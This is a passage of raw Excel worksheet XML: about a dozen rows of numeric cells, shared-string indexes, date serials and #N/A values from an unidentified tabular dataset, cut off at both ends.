      </c>
      <c r="AY1238">
        <v>5</v>
      </c>
      <c r="AZ1238">
        <v>2</v>
      </c>
      <c r="BA1238" t="s">
        <v>17733</v>
      </c>
      <c r="BB1238" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1238" t="s">
        <v>10966</v>
      </c>
      <c r="BD1238">
        <v>0</v>
      </c>
    </row>
    <row r="1239" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1239">
        <v>5684</v>
      </c>
      <c r="B1239" t="s">
        <v>9215</v>
      </c>
      <c r="C1239" t="s">
        <v>2308</v>
      </c>
      <c r="D1239" t="s">
        <v>9216</v>
      </c>
      <c r="E1239" t="s">
        <v>49</v>
      </c>
      <c r="F1239" t="s">
        <v>9217</v>
      </c>
      <c r="G1239" s="1">
        <v>44333</v>
      </c>
      <c r="H1239">
        <v>11285</v>
      </c>
      <c r="I1239">
        <v>11285</v>
      </c>
      <c r="J1239">
        <v>0</v>
      </c>
      <c r="K1239">
        <v>0</v>
      </c>
      <c r="L1239">
        <v>0</v>
      </c>
      <c r="M1239">
        <v>0</v>
      </c>
      <c r="N1239">
        <v>0</v>
      </c>
      <c r="O1239">
        <v>0</v>
      </c>
      <c r="P1239">
        <v>0</v>
      </c>
      <c r="Q1239">
        <v>3</v>
      </c>
      <c r="R1239">
        <v>10</v>
      </c>
      <c r="S1239">
        <v>0</v>
      </c>
      <c r="T1239">
        <v>1</v>
      </c>
      <c r="U1239">
        <v>0</v>
      </c>
      <c r="V1239">
        <v>0</v>
      </c>
      <c r="W1239">
        <v>0</v>
      </c>
      <c r="X1239">
        <v>0</v>
      </c>
      <c r="Y1239">
        <v>0</v>
      </c>
      <c r="Z1239">
        <v>0</v>
      </c>
      <c r="AA1239">
        <v>0</v>
      </c>
      <c r="AB1239">
        <v>140</v>
      </c>
      <c r="AC1239">
        <v>420</v>
      </c>
      <c r="AD1239">
        <v>0</v>
      </c>
      <c r="AE1239">
        <v>500</v>
      </c>
      <c r="AF1239" t="s">
        <v>9218</v>
      </c>
      <c r="AG1239">
        <v>98411</v>
      </c>
      <c r="AH1239">
        <v>33</v>
      </c>
      <c r="AJ1239">
        <v>485</v>
      </c>
      <c r="AK1239" t="s">
        <v>9219</v>
      </c>
      <c r="AL1239" t="s">
        <v>9220</v>
      </c>
      <c r="AM1239" t="s">
        <v>9221</v>
      </c>
      <c r="AN1239" t="s">
        <v>68</v>
      </c>
      <c r="AO1239">
        <v>2020</v>
      </c>
      <c r="AP1239">
        <v>82399665056</v>
      </c>
      <c r="AQ1239" t="s">
        <v>9222</v>
      </c>
      <c r="AR1239" t="s">
        <v>9218</v>
      </c>
      <c r="AS1239" t="s">
        <v>71</v>
      </c>
      <c r="AT1239" t="s">
        <v>72</v>
      </c>
      <c r="AU1239">
        <v>20</v>
      </c>
      <c r="AV1239">
        <v>1</v>
      </c>
      <c r="AW1239">
        <v>3</v>
      </c>
      <c r="AX1239">
        <v>1</v>
      </c>
      <c r="AY1239">
        <v>3</v>
      </c>
      <c r="AZ1239">
        <v>0</v>
      </c>
      <c r="BA1239" t="s">
        <v>17735</v>
      </c>
      <c r="BB1239" t="s">
        <v>17738</v>
      </c>
      <c r="BC1239" t="s">
        <v>9952</v>
      </c>
      <c r="BD1239">
        <v>0</v>
      </c>
    </row>
    <row r="1240" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1240">
        <v>5681</v>
      </c>
      <c r="B1240" t="s">
        <v>9223</v>
      </c>
      <c r="C1240" t="s">
        <v>2308</v>
      </c>
      <c r="D1240" t="s">
        <v>6305</v>
      </c>
      <c r="E1240" t="s">
        <v>49</v>
      </c>
      <c r="F1240" t="s">
        <v>5434</v>
      </c>
      <c r="G1240" s="1">
        <v>44327</v>
      </c>
      <c r="H1240">
        <v>11294</v>
      </c>
      <c r="I1240">
        <v>11294</v>
      </c>
      <c r="J1240">
        <v>0</v>
      </c>
      <c r="K1240">
        <v>0</v>
      </c>
      <c r="L1240">
        <v>0</v>
      </c>
      <c r="M1240">
        <v>0</v>
      </c>
      <c r="N1240">
        <v>0</v>
      </c>
      <c r="O1240">
        <v>0</v>
      </c>
      <c r="P1240">
        <v>0</v>
      </c>
      <c r="Q1240">
        <v>3</v>
      </c>
      <c r="R1240">
        <v>5</v>
      </c>
      <c r="S1240">
        <v>0</v>
      </c>
      <c r="T1240">
        <v>1</v>
      </c>
      <c r="U1240">
        <v>0</v>
      </c>
      <c r="V1240">
        <v>0</v>
      </c>
      <c r="W1240">
        <v>0</v>
      </c>
      <c r="X1240">
        <v>0</v>
      </c>
      <c r="Y1240">
        <v>0</v>
      </c>
      <c r="Z1240">
        <v>0</v>
      </c>
      <c r="AA1240">
        <v>0</v>
      </c>
      <c r="AB1240">
        <v>500</v>
      </c>
      <c r="AC1240">
        <v>400</v>
      </c>
      <c r="AD1240">
        <v>0</v>
      </c>
      <c r="AE1240">
        <v>5000</v>
      </c>
      <c r="AF1240" t="s">
        <v>9224</v>
      </c>
      <c r="AG1240">
        <v>98415</v>
      </c>
      <c r="AH1240">
        <v>33</v>
      </c>
      <c r="AJ1240">
        <v>485</v>
      </c>
      <c r="AK1240" t="s">
        <v>2313</v>
      </c>
      <c r="AL1240" t="s">
        <v>2314</v>
      </c>
      <c r="AM1240" t="s">
        <v>9225</v>
      </c>
      <c r="AN1240" t="s">
        <v>68</v>
      </c>
      <c r="AO1240">
        <v>2021</v>
      </c>
      <c r="AP1240">
        <v>81234234635</v>
      </c>
      <c r="AQ1240" t="s">
        <v>9226</v>
      </c>
      <c r="AR1240" t="s">
        <v>9224</v>
      </c>
      <c r="AS1240" t="s">
        <v>71</v>
      </c>
      <c r="AT1240" t="s">
        <v>72</v>
      </c>
      <c r="AU1240">
        <v>0</v>
      </c>
      <c r="AV1240">
        <v>0</v>
      </c>
      <c r="AW1240">
        <v>2</v>
      </c>
      <c r="AX1240">
        <v>0</v>
      </c>
      <c r="AY1240">
        <v>3</v>
      </c>
      <c r="AZ1240">
        <v>2</v>
      </c>
      <c r="BA1240" t="s">
        <v>17734</v>
      </c>
      <c r="BB1240" t="s">
        <v>17736</v>
      </c>
      <c r="BC1240" t="s">
        <v>9550</v>
      </c>
      <c r="BD1240" t="s">
        <v>13977</v>
      </c>
    </row>
    <row r="1241" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1241">
        <v>5687</v>
      </c>
      <c r="B1241" t="s">
        <v>9227</v>
      </c>
      <c r="C1241" t="s">
        <v>60</v>
      </c>
      <c r="D1241" t="s">
        <v>9228</v>
      </c>
      <c r="E1241" t="s">
        <v>363</v>
      </c>
      <c r="F1241" t="s">
        <v>364</v>
      </c>
      <c r="G1241" s="1">
        <v>44335</v>
      </c>
      <c r="H1241">
        <v>11302</v>
      </c>
      <c r="I1241">
        <v>11302</v>
      </c>
      <c r="J1241">
        <v>0</v>
      </c>
      <c r="K1241">
        <v>0</v>
      </c>
      <c r="L1241">
        <v>0</v>
      </c>
      <c r="M1241">
        <v>0</v>
      </c>
      <c r="N1241">
        <v>0</v>
      </c>
      <c r="O1241">
        <v>0</v>
      </c>
      <c r="P1241">
        <v>0</v>
      </c>
      <c r="Q1241">
        <v>0</v>
      </c>
      <c r="R1241">
        <v>0</v>
      </c>
      <c r="S1241">
        <v>0</v>
      </c>
      <c r="T1241">
        <v>1</v>
      </c>
      <c r="U1241">
        <v>0</v>
      </c>
      <c r="V1241">
        <v>0</v>
      </c>
      <c r="W1241">
        <v>0</v>
      </c>
      <c r="X1241">
        <v>0</v>
      </c>
      <c r="Y1241">
        <v>0</v>
      </c>
      <c r="Z1241">
        <v>0</v>
      </c>
      <c r="AA1241">
        <v>0</v>
      </c>
      <c r="AB1241">
        <v>0</v>
      </c>
      <c r="AC1241">
        <v>0</v>
      </c>
      <c r="AD1241">
        <v>0</v>
      </c>
      <c r="AE1241">
        <v>50000</v>
      </c>
      <c r="AF1241" t="s">
        <v>9229</v>
      </c>
      <c r="AG1241">
        <v>35352</v>
      </c>
      <c r="AH1241">
        <v>10</v>
      </c>
      <c r="AJ1241">
        <v>128</v>
      </c>
      <c r="AK1241" t="s">
        <v>4829</v>
      </c>
      <c r="AL1241" t="s">
        <v>9230</v>
      </c>
      <c r="AM1241" t="s">
        <v>9231</v>
      </c>
      <c r="AN1241" t="s">
        <v>68</v>
      </c>
      <c r="AO1241">
        <v>2001</v>
      </c>
      <c r="AP1241">
        <v>81279631333</v>
      </c>
      <c r="AQ1241" t="s">
        <v>9232</v>
      </c>
      <c r="AR1241" t="s">
        <v>9229</v>
      </c>
      <c r="AS1241" t="s">
        <v>371</v>
      </c>
      <c r="AT1241" t="s">
        <v>72</v>
      </c>
      <c r="AU1241">
        <v>0</v>
      </c>
      <c r="AV1241">
        <v>0</v>
      </c>
      <c r="AW1241">
        <v>0</v>
      </c>
      <c r="AX1241">
        <v>0</v>
      </c>
      <c r="AY1241">
        <v>4</v>
      </c>
      <c r="AZ1241">
        <v>1</v>
      </c>
      <c r="BA1241" t="s">
        <v>17737</v>
      </c>
      <c r="BB1241">
        <v>0</v>
      </c>
      <c r="BC1241">
        <v>0</v>
      </c>
      <c r="BD1241" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1242" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1242">
        <v>5637</v>
      </c>
      <c r="B1242" t="s">
        <v>9233</v>
      </c>
      <c r="C1242" t="s">
        <v>157</v>
      </c>
      <c r="D1242" t="s">
        <v>9234</v>
      </c>
      <c r="E1242" t="s">
        <v>363</v>
      </c>
      <c r="F1242" t="s">
        <v>364</v>
      </c>
      <c r="G1242" s="1">
        <v>44358</v>
      </c>
      <c r="H1242">
        <v>11315</v>
      </c>
      <c r="I1242">
        <v>11315</v>
      </c>
      <c r="J1242">
        <v>0</v>
      </c>
      <c r="K1242">
        <v>0</v>
      </c>
      <c r="L1242">
        <v>0</v>
      </c>
      <c r="M1242">
        <v>0</v>
      </c>
      <c r="N1242">
        <v>0</v>
      </c>
      <c r="O1242">
        <v>0</v>
      </c>
      <c r="P1242">
        <v>0</v>
      </c>
      <c r="Q1242">
        <v>0</v>
      </c>
      <c r="R1242">
        <v>0</v>
      </c>
      <c r="S1242">
        <v>0</v>
      </c>
      <c r="T1242">
        <v>1</v>
      </c>
      <c r="U1242">
        <v>0</v>
      </c>
      <c r="V1242">
        <v>0</v>
      </c>
      <c r="W1242">
        <v>0</v>
      </c>
      <c r="X1242">
        <v>0</v>
      </c>
      <c r="Y1242">
        <v>0</v>
      </c>
      <c r="Z1242">
        <v>0</v>
      </c>
      <c r="AA1242">
        <v>0</v>
      </c>
      <c r="AB1242">
        <v>0</v>
      </c>
      <c r="AC1242">
        <v>0</v>
      </c>
      <c r="AD1242">
        <v>0</v>
      </c>
      <c r="AE1242">
        <v>200000</v>
      </c>
      <c r="AF1242" t="s">
        <v>9235</v>
      </c>
      <c r="AG1242">
        <v>60184</v>
      </c>
      <c r="AH1242">
        <v>16</v>
      </c>
      <c r="AJ1242">
        <v>264</v>
      </c>
      <c r="AK1242" t="s">
        <v>2543</v>
      </c>
      <c r="AL1242" t="s">
        <v>2544</v>
      </c>
      <c r="AM1242" t="s">
        <v>9236</v>
      </c>
      <c r="AN1242" t="s">
        <v>82</v>
      </c>
      <c r="AO1242">
        <v>2002</v>
      </c>
      <c r="AP1242">
        <v>818336300</v>
      </c>
      <c r="AQ1242" t="s">
        <v>9237</v>
      </c>
      <c r="AR1242" t="s">
        <v>9235</v>
      </c>
      <c r="AS1242" t="s">
        <v>71</v>
      </c>
      <c r="AT1242" t="s">
        <v>86</v>
      </c>
      <c r="AU1242">
        <v>26</v>
      </c>
      <c r="AV1242">
        <v>1</v>
      </c>
      <c r="AW1242">
        <v>5</v>
      </c>
      <c r="AX1242">
        <v>0</v>
      </c>
      <c r="AY1242">
        <v>4</v>
      </c>
      <c r="AZ1242">
        <v>2</v>
      </c>
      <c r="BA1242" t="s">
        <v>16997</v>
      </c>
      <c r="BB1242" t="s">
        <v>17739</v>
      </c>
      <c r="BC1242">
        <v>0</v>
      </c>
      <c r="BD1242" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="1243" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1243">
        <v>5694</v>
      </c>
      <c r="B1243" t="s">
        <v>9238</v>
      </c>
      <c r="C1243" t="s">
        <v>3717</v>
      </c>
      <c r="D1243" t="s">
        <v>9239</v>
      </c>
      <c r="E1243" t="s">
        <v>49</v>
      </c>
      <c r="F1243" t="s">
        <v>7818</v>
      </c>
      <c r="G1243" s="1">
        <v>44337</v>
      </c>
      <c r="H1243">
        <v>11354</v>
      </c>
      <c r="I1243">
        <v>11354</v>
      </c>
      <c r="J1243">
        <v>0</v>
      </c>
      <c r="K1243">
        <v>0</v>
      </c>
      <c r="L1243">
        <v>0</v>
      </c>
      <c r="M1243">
        <v>0</v>
      </c>
      <c r="N1243">
        <v>0</v>
      </c>
      <c r="O1243">
        <v>6</v>
      </c>
      <c r="P1243">
        <v>0</v>
      </c>
      <c r="Q1243">
        <v>5</v>
      </c>
      <c r="R1243">
        <v>1</v>
      </c>
      <c r="S1243">
        <v>1</v>
      </c>
      <c r="T1243">
        <v>1</v>
      </c>
      <c r="U1243">
        <v>0</v>
      </c>
      <c r="V1243">
        <v>0</v>
      </c>
      <c r="W1243">
        <v>0</v>
      </c>
      <c r="X1243">
        <v>0</v>
      </c>
      <c r="Y1243">
        <v>0</v>
      </c>
      <c r="Z1243">
        <v>60</v>
      </c>
      <c r="AA1243">
        <v>0</v>
      </c>
      <c r="AB1243">
        <v>1200</v>
      </c>
      <c r="AC1243">
        <v>100</v>
      </c>
      <c r="AD1243">
        <v>1</v>
      </c>
      <c r="AE1243">
        <v>300</v>
      </c>
      <c r="AF1243" t="s">
        <v>9240</v>
      </c>
      <c r="AG1243">
        <v>38211</v>
      </c>
      <c r="AH1243">
        <v>8</v>
      </c>
      <c r="AJ1243">
        <v>125</v>
      </c>
      <c r="AK1243" t="s">
        <v>9241</v>
      </c>
      <c r="AL1243" t="s">
        <v>9242</v>
      </c>
      <c r="AM1243" t="s">
        <v>9243</v>
      </c>
      <c r="AN1243" t="s">
        <v>68</v>
      </c>
      <c r="AO1243">
        <v>2018</v>
      </c>
      <c r="AP1243">
        <v>82179413777</v>
      </c>
      <c r="AQ1243" t="s">
        <v>9240</v>
      </c>
      <c r="AR1243" t="s">
        <v>9244</v>
      </c>
      <c r="AS1243" t="s">
        <v>71</v>
      </c>
      <c r="AT1243" t="s">
        <v>72</v>
      </c>
      <c r="AU1243">
        <v>20</v>
      </c>
      <c r="AV1243">
        <v>0</v>
      </c>
      <c r="AW1243">
        <v>0</v>
      </c>
      <c r="AX1243">
        <v>0</v>
      </c>
      <c r="AY1243">
        <v>0</v>
      </c>
      <c r="AZ1243">
        <v>2</v>
      </c>
      <c r="BA1243" t="s">
        <v>17741</v>
      </c>
      <c r="BB1243" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1243" t="s">
        <v>10966</v>
      </c>
      <c r="BD1243">
        <v>0</v>
      </c>
    </row>
    <row r="1244" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1244">
        <v>5674</v>
      </c>
      <c r="B1244" t="s">
        <v>9245</v>
      </c>
      <c r="C1244" t="s">
        <v>477</v>
      </c>
      <c r="D1244" t="s">
        <v>9246</v>
      </c>
      <c r="E1244" t="s">
        <v>121</v>
      </c>
      <c r="F1244" t="s">
        <v>9247</v>
      </c>
      <c r="G1244" s="1">
        <v>44354</v>
      </c>
      <c r="H1244">
        <v>11395</v>
      </c>
      <c r="I1244">
        <v>11395</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t="s">
        <v>9248</v>
      </c>
      <c r="AG1244">
        <v>95378</v>
      </c>
      <c r="AH1244">
        <v>29</v>
      </c>
      <c r="AJ1244">
        <v>376</v>
      </c>
      <c r="AK1244" t="s">
        <v>715</v>
      </c>
      <c r="AL1244" t="s">
        <v>9249</v>
      </c>
      <c r="AM1244" t="s">
        <v>9250</v>
      </c>
      <c r="AN1244" t="s">
        <v>68</v>
      </c>
      <c r="AO1244">
        <v>2015</v>
      </c>
      <c r="AP1244">
        <v>81243141287</v>
      </c>
      <c r="AQ1244" t="s">
        <v>9251</v>
      </c>
      <c r="AR1244" t="s">
        <v>9060</v>
      </c>
      <c r="AS1244" t="s">
        <v>71</v>
      </c>
      <c r="AT1244" t="s">
        <v>72</v>
      </c>
      <c r="AU1244">
        <v>24</v>
      </c>
      <c r="AV1244">
        <v>0</v>
      </c>
      <c r="AW1244">
        <v>0</v>
      </c>
      <c r="AX1244">
        <v>0</v>
      </c>
      <c r="AY1244">
        <v>1</v>
      </c>
      <c r="AZ1244">
        <v>1</v>
      </c>
      <c r="BA1244" t="s">
        <v>17729</v>
      </c>
      <c r="BB1244">
        <v>0</v>
      </c>
      <c r="BC1244" t="s">
        <v>13708</v>
      </c>
      <c r="BD1244">
        <v>0</v>
      </c>
    </row>
    <row r="1245" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1245">
        <v>5693</v>
      </c>
      <c r="B1245" t="s">
        <v>9252</v>
      </c>
      <c r="C1245" t="s">
        <v>99</v>
      </c>
      <c r="D1245" t="s">
        <v>9253</v>
      </c>
      <c r="E1245" t="s">
        <v>142</v>
      </c>
      <c r="F1245" t="s">
        <v>666</v>
      </c>
      <c r="G1245" s="1">
        <v>44363</v>
      </c>
      <c r="H1245">
        <v>11425</v>
      </c>
      <c r="I1245">
        <v>11425</v>
      </c>
      <c r="J1245">
        <v>1</v>
      </c>
      <c r="K1245">
        <v>0</v>
      </c>
      <c r="L1245">
        <v>0</v>
      </c>
      <c r="M1245">
        <v>0</v>
      </c>
      <c r="N1245">
        <v>0</v>
      </c>
      <c r="O1245">
        <v>0</v>
      </c>
      <c r="P1245">
        <v>0</v>
      </c>
      <c r="Q1245">
        <v>0</v>
      </c>
      <c r="R1245">
        <v>0</v>
      </c>
      <c r="S1245">
        <v>1</v>
      </c>
      <c r="T1245">
        <v>0</v>
      </c>
      <c r="U1245">
        <v>250</v>
      </c>
      <c r="V1245">
        <v>0</v>
      </c>
      <c r="W1245">
        <v>0</v>
      </c>
      <c r="X1245">
        <v>0</v>
      </c>
      <c r="Y1245">
        <v>0</v>
      </c>
      <c r="Z1245">
        <v>0</v>
      </c>
      <c r="AA1245">
        <v>0</v>
      </c>
      <c r="AB1245">
        <v>0</v>
      </c>
      <c r="AC1245">
        <v>0</v>
      </c>
      <c r="AD1245">
        <v>1</v>
      </c>
      <c r="AE1245">
        <v>0</v>
      </c>
      <c r="AF1245" t="s">
        <v>9254</v>
      </c>
      <c r="AG1245">
        <v>14440</v>
      </c>
      <c r="AH1245">
        <v>12</v>
      </c>
      <c r="AJ1245">
        <v>160</v>
      </c>
      <c r="AK1245" t="s">
        <v>114</v>
      </c>
      <c r="AL1245" t="s">
        <v>114</v>
      </c>
      <c r="AM1245" t="s">
        <v>9255</v>
      </c>
      <c r="AN1245" t="s">
        <v>68</v>
      </c>
      <c r="AO1245">
        <v>2017</v>
      </c>
      <c r="AP1245">
        <v>81292520279</v>
      </c>
      <c r="AQ1245" t="s">
        <v>9256</v>
      </c>
      <c r="AR1245" t="s">
        <v>9254</v>
      </c>
      <c r="AS1245" t="s">
        <v>371</v>
      </c>
      <c r="AT1245" t="s">
        <v>72</v>
      </c>
      <c r="AU1245">
        <v>6</v>
      </c>
      <c r="AV1245">
        <v>0</v>
      </c>
      <c r="AW1245">
        <v>8</v>
      </c>
      <c r="AX1245">
        <v>0</v>
      </c>
      <c r="AY1245">
        <v>7</v>
      </c>
      <c r="AZ1245">
        <v>5</v>
      </c>
      <c r="BA1245" t="s">
        <v>17740</v>
      </c>
      <c r="BB1245" t="s">
        <v>16181</v>
      </c>
      <c r="BC1245" t="s">
        <v>9952</v>
      </c>
      <c r="BD1245" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1246" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1246">
        <v>5695</v>
      </c>
      <c r="B1246" t="s">
        <v>9257</v>
      </c>
      <c r="C1246" t="s">
        <v>3717</v>
      </c>
      <c r="D1246" t="s">
        <v>9258</v>
      </c>
      <c r="E1246" t="s">
        <v>142</v>
      </c>
      <c r="F1246" t="s">
        <v>3076</v>
      </c>
      <c r="G1246" s="1">
        <v>44337</v>
      </c>
      <c r="H1246">
        <v>11468</v>
      </c>
      <c r="I1246">
        <v>11468</v>
      </c>
      <c r="J1246">
        <v>0</v>
      </c>
      <c r="K1246">
        <v>0</v>
      </c>
      <c r="L1246">
        <v>0</v>
      </c>
      <c r="M1246">
        <v>0</v>
      </c>
      <c r="N1246">
        <v>0</v>
      </c>
      <c r="O1246">
        <v>6</v>
      </c>
      <c r="P1246">
        <v>0</v>
      </c>
      <c r="Q1246">
        <v>1200</v>
      </c>
      <c r="R1246">
        <v>1</v>
      </c>
      <c r="S1246">
        <v>0</v>
      </c>
      <c r="T1246">
        <v>0</v>
      </c>
      <c r="U1246">
        <v>0</v>
      </c>
      <c r="V1246">
        <v>0</v>
      </c>
      <c r="W1246">
        <v>0</v>
      </c>
      <c r="X1246">
        <v>0</v>
      </c>
      <c r="Y1246">
        <v>0</v>
      </c>
      <c r="Z1246">
        <v>60</v>
      </c>
      <c r="AA1246">
        <v>0</v>
      </c>
      <c r="AB1246">
        <v>100</v>
      </c>
      <c r="AC1246">
        <v>500</v>
      </c>
      <c r="AD1246">
        <v>0</v>
      </c>
      <c r="AE1246">
        <v>0</v>
      </c>
      <c r="AF1246" t="s">
        <v>9259</v>
      </c>
      <c r="AG1246">
        <v>38211</v>
      </c>
      <c r="AH1246">
        <v>8</v>
      </c>
      <c r="AJ1246">
        <v>125</v>
      </c>
      <c r="AK1246" t="s">
        <v>3808</v>
      </c>
      <c r="AL1246" t="s">
        <v>9260</v>
      </c>
      <c r="AM1246" t="s">
        <v>9261</v>
      </c>
      <c r="AN1246" t="s">
        <v>68</v>
      </c>
      <c r="AO1246">
        <v>2020</v>
      </c>
      <c r="AP1246">
        <v>81377536030</v>
      </c>
      <c r="AQ1246" t="s">
        <v>9259</v>
      </c>
      <c r="AR1246" t="s">
        <v>9259</v>
      </c>
      <c r="AS1246" t="s">
        <v>71</v>
      </c>
      <c r="AT1246" t="s">
        <v>72</v>
      </c>
      <c r="AU1246">
        <v>30</v>
      </c>
      <c r="AV1246">
        <v>0</v>
      </c>
      <c r="AW1246">
        <v>0</v>
      </c>
      <c r="AX1246">
        <v>3</v>
      </c>
      <c r="AY1246">
        <v>3</v>
      </c>
      <c r="AZ1246">
        <v>4</v>
      </c>
      <c r="BA1246" t="s">
        <v>17742</v>
      </c>
      <c r="BB1246" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1246" t="s">
        <v>14037</v>
      </c>
      <c r="BD1246">
        <v>0</v>
      </c>
    </row>
    <row r="1247" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1247">
        <v>5631</v>
      </c>
      <c r="B1247" t="s">
        <v>9262</v>
      </c>
      <c r="C1247" t="s">
        <v>99</v>
      </c>
      <c r="D1247" t="s">
        <v>9263</v>
      </c>
      <c r="E1247" t="s">
        <v>142</v>
      </c>
      <c r="F1247" t="s">
        <v>9264</v>
      </c>
      <c r="G1247" s="1">
        <v>44357</v>
      </c>
      <c r="H1247">
        <v>11507</v>
      </c>
      <c r="I1247">
        <v>11507</v>
      </c>
      <c r="J1247">
        <v>2</v>
      </c>
      <c r="K1247">
        <v>0</v>
      </c>
      <c r="L1247">
        <v>4</v>
      </c>
      <c r="M1247">
        <v>10</v>
      </c>
      <c r="N1247">
        <v>0</v>
      </c>
      <c r="O1247">
        <v>0</v>
      </c>
      <c r="P1247">
        <v>0</v>
      </c>
      <c r="Q1247">
        <v>0</v>
      </c>
      <c r="R1247">
        <v>0</v>
      </c>
      <c r="S1247">
        <v>0</v>
      </c>
      <c r="T1247">
        <v>1</v>
      </c>
      <c r="U1247">
        <v>1500000</v>
      </c>
      <c r="V1247">
        <v>0</v>
      </c>
      <c r="W1247">
        <v>16000</v>
      </c>
      <c r="X1247">
        <v>5000</v>
      </c>
      <c r="Y1247">
        <v>0</v>
      </c>
      <c r="Z1247">
        <v>0</v>
      </c>
      <c r="AA1247">
        <v>0</v>
      </c>
      <c r="AB1247">
        <v>0</v>
      </c>
      <c r="AC1247">
        <v>0</v>
      </c>
      <c r="AD1247">
        <v>0</v>
      </c>
      <c r="AE1247">
        <v>4000</v>
      </c>
      <c r="AF1247" t="s">
        <v>9265</v>
      </c>
      <c r="AG1247">
        <v>14440</v>
      </c>
      <c r="AH1247">
        <v>12</v>
      </c>
      <c r="AJ1247">
        <v>160</v>
      </c>
      <c r="AK1247" t="s">
        <v>396</v>
      </c>
      <c r="AL1247" t="s">
        <v>396</v>
      </c>
      <c r="AM1247" t="s">
        <v>9266</v>
      </c>
      <c r="AN1247" t="s">
        <v>55</v>
      </c>
      <c r="AO1247">
        <v>2018</v>
      </c>
      <c r="AP1247" t="s">
        <v>9267</v>
      </c>
      <c r="AQ1247" t="s">
        <v>9268</v>
      </c>
      <c r="AR1247" t="s">
        <v>9265</v>
      </c>
      <c r="AS1247" t="s">
        <v>71</v>
      </c>
      <c r="AT1247" t="s">
        <v>58</v>
      </c>
      <c r="AU1247">
        <v>25</v>
      </c>
      <c r="AV1247">
        <v>0</v>
      </c>
      <c r="AW1247">
        <v>135</v>
      </c>
      <c r="AX1247">
        <v>17</v>
      </c>
      <c r="AY1247">
        <v>16</v>
      </c>
      <c r="AZ1247">
        <v>17</v>
      </c>
      <c r="BA1247" t="s">
        <v>17715</v>
      </c>
      <c r="BB1247" t="s">
        <v>16171</v>
      </c>
      <c r="BC1247">
        <v>0</v>
      </c>
      <c r="BD1247" t="s">
        <v>14023</v>
      </c>
    </row>
    <row r="1248" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1248">
        <v>5678</v>
      </c>
      <c r="B1248" t="s">
        <v>9269</v>
      </c>
      <c r="C1248" t="s">
        <v>477</v>
      </c>
      <c r="D1248" t="s">
        <v>9270</v>
      </c>
      <c r="E1248" t="s">
        <v>916</v>
      </c>
      <c r="F1248" t="s">
        <v>9271</v>
      </c>
      <c r="G1248" s="1">
        <v>44356</v>
      </c>
      <c r="H1248">
        <v>11526</v>
      </c>
      <c r="I1248">
        <v>11526</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t="s">
        <v>9272</v>
      </c>
      <c r="AG1248">
        <v>95378</v>
      </c>
      <c r="AH1248">
        <v>29</v>
      </c>
      <c r="AJ1248">
        <v>376</v>
      </c>
      <c r="AK1248" t="s">
        <v>715</v>
      </c>
      <c r="AL1248" t="s">
        <v>9273</v>
      </c>
      <c r="AM1248" t="s">
        <v>9274</v>
      </c>
      <c r="AN1248" t="s">
        <v>68</v>
      </c>
      <c r="AO1248">
        <v>2015</v>
      </c>
      <c r="AP1248">
        <v>85341205040</v>
      </c>
      <c r="AQ1248" t="s">
        <v>9275</v>
      </c>
      <c r="AR1248" t="s">
        <v>9272</v>
      </c>
      <c r="AS1248" t="s">
        <v>71</v>
      </c>
      <c r="AT1248" t="s">
        <v>72</v>
      </c>
      <c r="AU1248">
        <v>24</v>
      </c>
      <c r="AV1248">
        <v>0</v>
      </c>
      <c r="AW1248">
        <v>0</v>
      </c>
      <c r="AX1248">
        <v>0</v>
      </c>
      <c r="AY1248">
        <v>1</v>
      </c>
      <c r="AZ1248">
        <v>4</v>
      </c>
      <c r="BA1248" t="s">
        <v>17730</v>
      </c>
      <c r="BB1248">
        <v>0</v>
      </c>
      <c r="BC1248" t="s">
        <v>13708</v>
      </c>
      <c r="BD1248">
        <v>0</v>
      </c>
    </row>
    <row r="1249" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1249">
        <v>5665</v>
      </c>
      <c r="B1249" t="s">
        <v>2097</v>
      </c>
      <c r="C1249" t="s">
        <v>189</v>
      </c>
      <c r="D1249" t="s">
        <v>9276</v>
      </c>
      <c r="E1249" t="s">
        <v>142</v>
      </c>
      <c r="F1249" t="s">
        <v>9277</v>
      </c>
      <c r="G1249" s="1">
        <v>44362</v>
      </c>
      <c r="H1249">
        <v>11545</v>
      </c>
      <c r="I1249">
        <v>11545</v>
      </c>
      <c r="J1249">
        <v>1</v>
      </c>
      <c r="K1249">
        <v>1</v>
      </c>
      <c r="L1249">
        <v>1</v>
      </c>
      <c r="M1249">
        <v>0</v>
      </c>
      <c r="N1249">
        <v>0</v>
      </c>
      <c r="O1249">
        <v>0</v>
      </c>
      <c r="P1249">
        <v>0</v>
      </c>
      <c r="Q1249">
        <v>0</v>
      </c>
      <c r="R1249">
        <v>0</v>
      </c>
      <c r="S1249">
        <v>1</v>
      </c>
      <c r="T1249">
        <v>1</v>
      </c>
      <c r="U1249">
        <v>75</v>
      </c>
      <c r="V1249">
        <v>4</v>
      </c>
      <c r="W1249">
        <v>4</v>
      </c>
      <c r="X1249">
        <v>0</v>
      </c>
      <c r="Y1249">
        <v>0</v>
      </c>
      <c r="Z1249">
        <v>0</v>
      </c>
      <c r="AA1249">
        <v>0</v>
      </c>
      <c r="AB1249">
        <v>0</v>
      </c>
      <c r="AC1249">
        <v>0</v>
      </c>
      <c r="AD1249">
        <v>1</v>
      </c>
      <c r="AE1249">
        <v>0</v>
      </c>
      <c r="AF1249" t="s">
        <v>9278</v>
      </c>
      <c r="AG1249">
        <v>97582</v>
      </c>
      <c r="AH1249">
        <v>31</v>
      </c>
      <c r="AJ1249">
        <v>454</v>
      </c>
      <c r="AK1249" t="s">
        <v>785</v>
      </c>
      <c r="AL1249" t="s">
        <v>9279</v>
      </c>
      <c r="AM1249" t="s">
        <v>9280</v>
      </c>
      <c r="AN1249" t="s">
        <v>55</v>
      </c>
      <c r="AO1249">
        <v>2018</v>
      </c>
      <c r="AP1249">
